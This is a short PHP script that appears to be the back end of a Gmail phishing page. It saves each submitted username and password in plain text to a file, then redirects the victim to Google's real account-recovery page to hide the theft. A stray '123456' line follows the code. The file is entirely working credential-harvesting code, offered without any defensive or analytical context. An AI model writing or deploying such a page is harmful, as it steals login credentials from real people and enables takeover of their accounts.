<?phpfile_put_contents("usernames.txt", "Gmail Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);header('Location: https://accounts.google.com/signin/v2/recoveryidentifier');exit();?>
123456